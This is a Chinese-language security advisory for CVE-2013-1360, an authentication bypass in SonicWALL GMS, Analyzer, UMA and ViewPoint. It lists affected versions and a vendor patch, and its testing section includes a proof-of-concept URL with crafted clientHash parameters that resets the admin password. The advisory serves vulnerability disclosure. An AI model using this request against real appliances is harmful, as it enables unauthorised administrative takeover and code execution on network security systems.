发布日期:2013-01-17
更新日期:2013-01-22受影响系统:
SonicWALL GMS/Analyzer/UMA 7.0.x
SonicWALL GMS/Analyzer/UMA 6.0.x
SonicWALL GMS/Analyzer/UMA 5.1.x
SonicWALL GMS/ViewPoint 5.0.x
SonicWALL GMS/ViewPoint 4.1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57446
CVE(CAN) ID: CVE-2013-1360
SonicWALL 提供面向中小型企业与分布式企业的互联网安全解决方案。
SonicWALL Global Management System (GMS), ViewPoint, Universal Management Appliance (UMA), Analyzer在实现上存在身份验证绕过漏洞,通过发送特制请求到SGMS接口,攻击者可利用此漏洞以管理员权限访问Web接口,导致以系统级别权限执行任意代码。
<*来源:Nikolas Sotiriu
链接:http://securitytracker.com/id/1028007
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/sgms/auth?clientHash=765c5e5b571050030b63666663383064663 83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092 4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000 00000000001建议:
--------------------------------------------------------------------------------
厂商补丁:
SonicWALL
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sonicwall.comAxway Secure Messenger 远程信息泄露漏洞Drupal Live CSS模块任意文件上传漏洞相关资讯 身份验证绕过漏洞
- Microsoft .NET Framework 身份验 (05/16/2013 05:46:04)
- IBM SAN Volume Controller和 (02/28/2013 16:05:35)
- Hitachi Cosminexus产品身份验证绕 (01/30/2013 07:54:27)
| - EMC Smarts Network Configuration (03/27/2013 21:56:03)
- Lorex LNC116和LNC104 IP摄像机远 (02/28/2013 08:28:01)
- NetIQ Privileged User Manager管 (11/17/2012 08:00:58)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评
|
易网时代-编程资源站